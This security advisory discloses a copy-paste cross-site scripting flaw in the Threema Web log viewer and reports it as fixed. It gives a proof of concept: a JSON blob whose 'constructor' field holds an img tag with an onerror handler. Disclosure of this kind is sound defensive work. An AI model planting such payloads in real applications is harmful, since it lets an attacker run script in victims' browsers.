GHSL-2021-1004: Copy-paste XSS in Threema Web text editor

Coordinated Disclosure Timeline

• 2021-09-15: Report sent to security2021@threema.ch
• 2021-09-16: Maintainers request more details about the issue
• 2021-09-21: Issue is fixed

Summary

Copy-paste XSS in Threema Web text editor

Product

Threema Web

Tested Version

v2.3.15

Details

Issue: Copy-paste XSS in Threema-Web (GHSL-2021-1004)

The Threema Web text editor is vulnerable to copy-paste cross-site scripting (XSS). For this particular type of XSS, the victim needs to be fooled into copying a malicious payload into the text editor.

Proof of concept (tested on Chrome):

• Clone the project: git clone git@github.com:threema-ch/threema-web.git
• Open the troubleshoot/log.html file in a web browser.
• Focus the page.
• Paste the following into the page:

{
  "config": {},
  "browser": "XSS browser",
  "log": [
    [
      1631303341684,
      "debug",
      "%c[State-S]",
      "",
      {
      	"constructor": "<img src='foo' onerror='alert(1)'>"
      }
    ]
  ]
}

Note: This issue was found using the following CodeQL query

Impact

This issue may lead to XSS with user interaction

Credit

This issue was discovered by GHSL team member @erik-krogh (Erik Kristensen) using the CodeQL query contributed by @bananabr (Daniel Santos).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2021-1004 in any communication regarding this issue.